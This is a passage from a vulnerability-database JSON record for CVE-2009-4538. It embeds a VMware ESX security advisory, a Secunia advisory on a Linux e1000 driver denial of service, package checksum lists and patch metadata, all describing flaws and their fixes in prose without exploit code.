20193918 98b3c6e44f8e302cca36530b434e9525\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_sparc.deb\n      Size/MD5:   740254 b1a453339b4d68717a445f07b87b53a4\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   266068 1b8caecb838a9dd9b9c765f6603197a3\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   209168 e0e78f6a435e0ca46d5680e08d6e8db0\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    26268 f730be03c2b96e53e779a5d3df4cde93\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   314080 b673ee07d0c907d6ba00a561b915868d\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:  1675490 8642bd711b6643bd26ddc80674cef9e4\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   222882 136f6b9e24a16823f7309438fd0bd60a\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   121954 75090ea655204cc898db4634fc8aa021\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    38798 a11bcf765626194255c1d5a7d0106c2a\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   100798 af5903bc65fd381528f733fb1ba4100f\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:     8932 ebcb23a73a538276e41fcff9b7bb1d15\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    62926 7eba529ee44c2e107b693605dcbf1247\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   120960 8f63ad112de0797974650631dee53d13\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:  1217912 87a2a4f21ee86e0f36bc5298a226513b\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   101576 057a15ca3fa891e47216adcf5ae071f7\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   200148 f90834ae24c0f516ef83fa5aa66bafbb\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   184674 d704744a26941df63b9195288306fa7b\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ------------------------------------------------------------------------\n                   VMware Security Advisory\n\nAdvisory ID:       VMSA-2010-0009\nSynopsis:          ESXi ntp and ESX Service Console third party updates\nIssue date:        2010-05-27\nUpdated on:        2010-05-27 (initial release of advisory)\nCVE numbers:       CVE-2009-2695 CVE-2009-2908 CVE-2009-3228\n                   CVE-2009-3286 CVE-2009-3547 CVE-2009-3613\n                   CVE-2009-3612 CVE-2009-3620 CVE-2009-3621\n                   CVE-2009-3726 CVE-2007-4567 CVE-2009-4536\n                   CVE-2009-4537 CVE-2009-4538 CVE-2006-6304\n                   CVE-2009-2910 CVE-2009-3080 CVE-2009-3556\n                   CVE-2009-3889 CVE-2009-3939 CVE-2009-4020\n                   CVE-2009-4021 CVE-2009-4138 CVE-2009-4141\n                   CVE-2009-4272 CVE-2009-3563 CVE-2009-4355\n                   CVE-2009-2409 CVE-2009-0590 CVE-2009-1377\n                   CVE-2009-1378 CVE-2009-1379 CVE-2009-1386\n                   CVE-2009-1387 CVE-2009-4212 CVE-2009-1384\n                   CVE-2010-0097 CVE-2010-0290 CVE-2009-3736\n                   CVE-2010-0001 CVE-2010-0426 CVE-2010-0427\n                   CVE-2010-0382\n- ------------------------------------------------------------------------\n\n1. Summary\n\n   ESXi update for ntp and ESX Console OS (COS) updates for COS\n   kernel, openssl, krb5, gcc, bind, gzip, sudo. \n\n2. Relevant releases\n\n   VMware ESX 4.0.0 without patches ESX400-201005401-SG,\n   ESX400-201005406-SG, ESX400-201005408-SG, ESX400-201005407-SG,\n   ESX400-201005405-SG, ESX400-201005409-SG\n\n3. Problem Description\n\n a. Service Console update for COS kernel\n\n    Updated COS package \"kernel\" addresses the security issues that are\n    fixed through versions 2.6.18-164.11.1. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2009-2695, CVE-2009-2908, CVE-2009-3228,\n    CVE-2009-3286, CVE-2009-3547, CVE-2009-3613 to the security issues\n    fixed in kernel 2.6.18-164.6.1\n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2009-3612, CVE-2009-3620, CVE-2009-3621,\n    CVE-2009-3726 to the security issues fixed in kernel 2.6.18-164.9.1. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2007-4567, CVE-2009-4536, CVE-2009-4537,\n    CVE-2009-4538 to the security issues fixed in kernel 2.6.18-164.10.1\n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2006-6304, CVE-2009-2910, CVE-2009-3080,\n    CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020,\n    CVE-2009-4021, CVE-2009-4138, CVE-2009-4141, and CVE-2009-4272 to\n    the security issues fixed in kernel 2.6.18-164.11.1. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201005401-SG\n    ESX            3.5       ESX      not applicable\n    ESX            3.0.3     ESX      not applicable\n    ESX            2.5.5     ESX      not applicable\n\n    vMA            4.0       RHEL5    affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n b. ESXi userworld update for ntp\n\n    The Network Time Protocol (NTP) is used to synchronize the time of\n    a computer client or server to another server or reference time\n    source. \n\n    A vulnerability in ntpd could allow a remote attacker to cause a\n    denial of service (CPU and bandwidth consumption) by using\n    MODE_PRIVATE to send a spoofed (1) request or (2) response packet\n    that triggers a continuous exchange of MODE_PRIVATE error responses\n    between two NTP daemons. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-3563 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           4.0       ESXi     ESXi400-201005401-SG\n    ESXi           3.5       ESXi     affected, patch pending\n\n    ESX            any       ESX      not applicable\n\n    vMA            any       RHEL5    not applicable\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n c. Service Console package openssl updated to 0.9.8e-12.el5_4.1\n\n    OpenSSL is a toolkit implementing SSL v2/v3 and TLS protocols with\n    full-strength cryptography world-wide. \n\n    A memory leak in the zlib could allow a remote attacker to cause a\n    denial of service (memory consumption) via vectors that trigger\n    incorrect calls to the CRYPTO_cleanup_all_ex_data function. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-4355 to this issue. \n\n    A vulnerability was discovered which may allow remote attackers to\n    spoof certificates by using MD2 design flaws to generate a hash\n    collision in less than brute-force time. NOTE: the scope of this\n    issue is currently limited because the amount of computation\n    required is still large. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-2409 to this issue. \n\n    This update also includes security fixes that were first addressed\n    in version openssl-0.9.8e-12.el5.i386.rpm. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the names CVE-2009-0590, CVE-2009-1377, CVE-2009-1378,\n    CVE-2009-1379, CVE-2009-1386 and CVE-2009-1387 to these issues. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201005401-SG\n    ESX            3.5       ESX      not applicable\n    ESX            3.0.3     ESX      not applicable\n    ESX            2.5.5     ESX      not applicable\n\n    vMA            4.0       RHEL5    affected, patch pending**\n\n  *  hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n  ** see VMSA-2010-0004\n\n d. Service Console update for krb5 to 1.6.1-36.el5_4.1 and pam_krb5 to\n    2.2.14-15. \n\n    Kerberos is a network authentication protocol. It is designed to\n    provide strong authentication for client/server applications by\n    using secret-key cryptography. \n\n    Multiple integer underflows in the AES and RC4 functionality in the\n    crypto library could allow remote attackers to cause a denial of\n    service (daemon crash) or possibly execute arbitrary code by\n    providing ciphertext with a length that is too short to be valid. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-4212 to this issue. \n\n    The service console package for pam_krb5 is updated to version\n    pam_krb5-2.2.14-15. This update fixes a flaw found in pam_krb5. In\n    some non-default configurations (specifically, where pam_krb5 would\n    be the first module to prompt for a password), a remote attacker\n    could use this flaw to recognize valid usernames, which would aid a\n    dictionary-based password guess attack. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-1384 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201005406-SG\n    ESX            3.5       ESX      affected, patch pending\n    ESX            3.0.3     ESX      affected, patch pending\n    ESX            2.5.5     ESX      affected, patch pending\n\n    vMA            4.0       RHEL5    affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n e. Service Console package bind updated to 9.3.6-4.P1.el5_4.2\n\n    BIND (Berkeley Internet Name Daemon) is by far the most widely used\n    Domain Name System (DNS) software on the Internet. \n\n    A vulnerability was discovered which could allow remote attacker to\n    add the Authenticated Data (AD) flag to a forged NXDOMAIN response\n    for an existing domain. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-0097 to this issue. \n\n    A vulnerability was discovered which could allow remote attackers\n    to conduct DNS cache poisoning attacks by receiving a recursive\n    client query and sending a response that contains CNAME or DNAME\n    records, which do not have the intended validation before caching. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-0290 to this issue. \n\n    A vulnerability was found in the way that bind handles out-of-\n    bailiwick data accompanying a secure response without re-fetching\n    from the original source, which could allow remote attackers to\n    have an unspecified impact via a crafted response. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-0382 to this issue. \n\n    NOTE: ESX does not use the BIND name service daemon by default. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201005408-SG\n    ESX            3.5       ESX      not applicable\n    ESX            3.0.3     ESX      not applicable\n    ESX            2.5.5     ESX      not applicable\n\n    vMA            4.0       RHEL5    affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n f. Service Console package gcc updated to 3.2.3-60\n\n    The GNU Compiler Collection includes front ends for C, C++,\n    Objective-C, Fortran, Java, and Ada, as well as libraries for these\n    languages\n\n    GNU Libtool\u0027s ltdl.c attempts to open .la library files in the\n    current working directory.  This could allow a local user to gain\n    privileges via a Trojan horse file.  The GNU C Compiler collection\n    (gcc) provided in ESX contains a statically linked version of the\n    vulnerable code, and is being replaced. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-3736 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not applicable\n\n    ESX            4.0       ESX      ESX400-201005407-SG\n    ESX            3.5       ESX      affected, patch pending\n    ESX            3.0.3     ESX      affected, patch pending\n    ESX            2.5.5     ESX      affected, patch pending\n\n    vMA            4.0       RHEL5    affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n g. Service Console package gzip update to 1.3.3-15.rhel3\n\n    gzip is a software application used for file compression\n\n    An integer underflow in gzip\u0027s unlzw function on 64-bit platforms\n    may allow a remote attacker to trigger an array index error\n    leading to a denial of service (application crash) or possibly\n    execute arbitrary code via a crafted LZW compressed file. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-0001 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201005405-SG\n    ESX            3.5       ESX      affected, patch pending\n    ESX            3.0.3     ESX      affected, patch pending\n    ESX            2.5.5     ESX      affected, patch pending\n\n    vMA            4.0       RHEL5    affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n h. Service Console package sudo updated to 1.6.9p17-6.el5_4\n\n    Sudo (su \"do\") allows a system administrator to delegate authority\n    to give certain users (or groups of users) the ability to run some\n    (or all) commands as root or another user while providing an audit\n    trail of the commands and their arguments. \n\n    When a pseudo-command is enabled, sudo permits a match between the\n    name of the pseudo-command and the name of an executable file in an\n    arbitrary directory, which allows local users to gain privileges\n    via a crafted executable file. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-0426 to this issue. \n\n    When the runas_default option is used, sudo does not properly set\n    group memberships, which allows local users to gain privileges via\n    a sudo command. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-0427 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201005409-SG\n    ESX            3.5       ESX      not applicable\n    ESX            3.0.3     ESX      not applicable\n    ESX            2.5.5     ESX      not applicable\n\n    vMA            4.0       RHEL5    affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n4. Solution\n\n   Please review the patch/release notes for your product and version\n   and verify the md5sum of your downloaded file. \n\n   ESX 4.0\n   -------\n   http://bit.ly/aqTCqn\n   md5sum: ace37cd8d7c6388edcea2798ba8be939\n   sha1sum: 8fe7312fe74a435e824d879d4f1ff33df25cee78\n   http://kb.vmware.com/kb/1013127\n\n   Note ESX400-201005001 contains the following security bulletins\n   ESX400-201005404-SG (ntp), ESX400-201005405-SG (gzip),\n   ESX400-201005408-SG (bind), ESX400-201005401-SG (kernel, openssl),\n   ESX400-201005406-SG (krb5, pam_krb5), ESX400-201005402-SG (JRE),\n   ESX400-201005403-SG (expat), ESX400-201005409-SG (sudo),\n   ESX400-201005407-SG (gcc). \n\n5. References\n\n   CVE numbers\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2695\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2908\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3228\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3286\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3613\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3612\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3620\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3621\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3726\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4567\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4536\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4537\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4538\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6304\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2910\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3080\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3556\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3889\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3939\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4020\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4021\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4138\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4141\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4272\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3563\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4355\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0590\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1377\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1379\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1387\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4212\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1384\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0097\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0290\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3736\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0001\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0426\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0427\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0382\n\n- ------------------------------------------------------------------------\n\n6. Change log\n\n2010-05-27  VMSA-2010-0009\nInitial security advisory after release of patch 06 bulletins for ESX\n4.0 on 2010-05-27\n\n- -----------------------------------------------------------------------\n7. Contact\n\nE-mail list for product security notifications and announcements:\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\nThis Security Advisory is posted to the following lists:\n\n  * security-announce at lists.vmware.com\n  * bugtraq at securityfocus.com\n  * full-disclosure at lists.grok.org.uk\n\nE-mail:  security at vmware.com\nPGP key at: http://kb.vmware.com/kb/1055\n\nVMware Security Center\nhttp://www.vmware.com/security\n\nVMware security response policy\nhttp://www.vmware.com/support/policies/security_response.html\n\nGeneral support life cycle policy\nhttp://www.vmware.com/support/policies/eos.html\n\nVMware Infrastructure support life cycle policy\nhttp://www.vmware.com/support/policies/eos_vi.html\n\nCopyright 2010 VMware Inc.  All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.10 (MingW32)\n\niEYEARECAAYFAkv/V8IACgkQS2KysvBH1xnqNgCcCwwelsQK6DQjcTc2wnIPp0EW\nE70An2gfkiCQ5FNqvf3y+kNredxyVZwI\n=JW3s\n-----END PGP SIGNATURE-----\n. ----------------------------------------------------------------------\n\nDo you have VARM strategy implemented?\n\n(Vulnerability Assessment Remediation Management)  \n\nIf not, then implement it through the most reliable vulnerability\nintelligence source on the market. \n\nImplement it through Secunia. \n\nFor more information visit:\nhttp://secunia.com/advisories/business_solutions/\n\nAlternatively request a call from a Secunia representative today to\ndiscuss how we can help you with our capabilities contact us at:\nsales@secunia.com\n\n----------------------------------------------------------------------\n\nTITLE:\nLinux Kernel e1000 Driver Denial of Service Vulnerability\n\nSECUNIA ADVISORY ID:\nSA35265\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/35265/\n\nDESCRIPTION:\nA vulnerability has been reported in the Linux Kernel, which can be\nexploited by malicious people to cause a DoS (Denial of Service). \n\nThe vulnerability is caused due to an error in the\n\"e1000_clean_rx_irq()\" function in drivers/net/e1000/e1000_main.c. \nThis can be exploited to cause a kernel panic via specially crafted\nnetwork packets sent to an affected system. \n\nSOLUTION:\nFixed in the GIT repository. \nhttp://git.kernel.org/linus/ea30e11970a96cfe5e32c03a29332554573b4a10\n\nPROVIDED AND/OR DISCOVERED BY:\nNeil Horman\n\nORIGINAL ADVISORY:\nhttp://git.kernel.org/linus/ea30e11970a96cfe5e32c03a29332554573b4a10\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \nHowever, given the high frequency at which low-severity security\nissues are discovered in the kernel and the resource requirements of\ndoing an update, updates for lower priority issues will normally not\nbe released for all kernels at the same time. Rather, they will be\nreleased in a staggered or \"leap-frog\" fashion. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2009-4538"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001006"
      },
      {
        "db": "BID",
        "id": "37523"
      },
      {
        "db": "VULHUB",
        "id": "VHN-41984"
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-4538"
      },
      {
        "db": "PACKETSTORM",
        "id": "86790"
      },
      {
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "db": "PACKETSTORM",
        "id": "90046"
      },
      {
        "db": "PACKETSTORM",
        "id": "78056"
      },
      {
        "db": "PACKETSTORM",
        "id": "86286"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2009-4538",
        "trust": 3.3
      },
      {
        "db": "BID",
        "id": "37523",
        "trust": 2.9
      },
      {
        "db": "SECUNIA",
        "id": "38031",
        "trust": 2.6
      },
      {
        "db": "SECTRACK",
        "id": "1023420",
        "trust": 2.5
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2009/12/31/1",
        "trust": 1.8
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2009/12/29/2",
        "trust": 1.8
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2009/12/28/1",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "38610",
        "trust": 1.2
      },
      {
        "db": "SECUNIA",
        "id": "38492",
        "trust": 1.2
      },
      {
        "db": "SECUNIA",
        "id": "38276",
        "trust": 1.2
      },
      {
        "db": "SECUNIA",
        "id": "38779",
        "trust": 1.2
      },
      {
        "db": "SECUNIA",
        "id": "38296",
        "trust": 1.2
      },
      {
        "db": "SECUNIA",
        "id": "35265",
        "trust": 0.9
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001006",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-078",
        "trust": 0.7
      },
      {
        "db": "MLIST",
        "id": "[OSS-SECURITY] 20091229 RE: CVE REQUESTS - KERNEL SECURITY REGRESSIONS FOR CVE-2009-1385/AND -1389",
        "trust": 0.6
      },
      {
        "db": "MLIST",
        "id": "[OSS-SECURITY] 20091228 CVE REQUESTS - KERNEL SECURITY REGRESSIONS FOR CVE-2009-1385/AND -1389",
        "trust": 0.6
      },
      {
        "db": "MLIST",
        "id": "[OSS-SECURITY] 20091231 RE: CVE REQUESTS - KERNEL SECURITY REGRESSIONS FOR CVE-2009-1385/AND -1389",
        "trust": 0.6
      },
      {
        "db": "NSFOCUS",
        "id": "14332",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2010:0095",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2010:0019",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2010:0020",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2010:0041",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-41984",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-4538",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "86790",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "85958",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "90046",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "78056",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "86286",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-41984"
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-4538"
      },
      {
        "db": "BID",
        "id": "37523"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001006"
      },
      {
        "db": "PACKETSTORM",
        "id": "86790"
      },
      {
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "db": "PACKETSTORM",
        "id": "90046"
      },
      {
        "db": "PACKETSTORM",
        "id": "78056"
      },
      {
        "db": "PACKETSTORM",
        "id": "86286"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-078"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-4538"
      }
    ]
  },
  "id": "VAR-200906-0605",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-41984"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T21:06:23.926000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "kernel-2.6.18-128.14.AXS3",
        "trust": 0.8,
        "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=1005"
      },
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "1992",
        "trust": 0.8,
        "url": "http://www.miraclelinux.com/support/index.php?q=node/99\u0026errata_id=1992"
      },
      {
        "title": "RHSA-2010:0019",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0019.html"
      },
      {
        "title": "RHSA-2010:0020",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0020.html"
      },
      {
